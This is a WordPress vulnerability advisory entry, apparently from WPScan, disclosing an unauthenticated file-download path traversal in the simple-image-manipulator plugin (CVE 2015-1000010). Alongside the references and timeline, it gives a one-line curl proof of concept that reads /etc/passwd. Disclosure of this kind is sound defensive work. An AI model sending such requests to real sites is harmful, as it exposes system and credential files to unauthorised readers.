simple-image-manipulator <= 1.0 - Remote File Download



Description
Plugin is still affected and has been closed.

In ./simple-image-manipulator/controller/download.php no checks are made to authenticate the user or sanitize input when determining file location.
Proof of Concept
$ curl  "http://www.vapidlabs.com/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"

Affects Plugin

no known fix
- plugin closed

References

CVE 2015-1000010
ExploitDB 37753
URL https://vapid.dhs.org/advisory.php?v=147

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Submitter Larry W. Cashdollar
Submitter Twitter _larry0
Views 6697
Verified No
WPVDB ID 8123

Timeline

Publicly Published 2015-08-02 (almost 5 years ago)
Added 2015-08-03 (almost 5 years ago)
Last Updated 2019-11-28 (8 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin